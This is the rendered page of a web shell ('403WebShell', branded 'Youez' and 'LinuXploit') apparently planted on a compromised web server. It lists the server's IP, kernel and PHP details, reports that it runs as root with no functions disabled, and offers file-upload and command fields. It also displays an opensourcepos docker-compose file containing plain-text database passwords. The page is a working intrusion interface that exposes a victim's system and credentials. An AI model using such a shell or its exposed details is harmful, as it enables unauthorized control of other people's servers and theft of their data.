Uname:Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64

Base Dir : /var/www/sweetheart.mx/htdocs

User : root


Who Knows WP Shell uploader
Uname:Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 216.238.66.20  /  Your IP : 216.73.216.199
Web Server : nginx/1.30.4
System : Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
User : root ( 0)
PHP Version : 8.2.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/domum.gamliel.mx/htdocs/opensourcepos/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/domum.gamliel.mx/htdocs/opensourcepos/docker-compose.dev.yml
version: '3.4'

volumes:
    uploads:
        driver: local
  
services:

    ospos:
        build:
            context: .
            target: ospos_dev
        container_name: ospos_dev
        restart: always
        depends_on:
          - mysql
        ports:
          - "80:80"
        volumes:
          - .:/app
        environment:
          - PHP_TIMEZONE=UTC
          - MYSQL_USERNAME=admin
          - MYSQL_PASSWORD=pointofsale
          - MYSQL_DB_NAME=ospos
          - MYSQL_HOST_NAME=mysql
          - XDEBUG_CONFIG=remote_host=172.17.0.1

    mysql:
        image: mariadb:10.5
        container_name: mysql
        restart: always
        ports:
          - "3306:3306"
        volumes:
          - ./database/database.sql:/docker-entrypoint-initdb.d/database.sql
        environment:
          - MYSQL_ROOT_PASSWORD=pointofsale
          - MYSQL_DATABASE=ospos
          - MYSQL_USER=admin
          - MYSQL_PASSWORD=pointofsale

Youez - 2016 - github.com/yon3zu
LinuXploit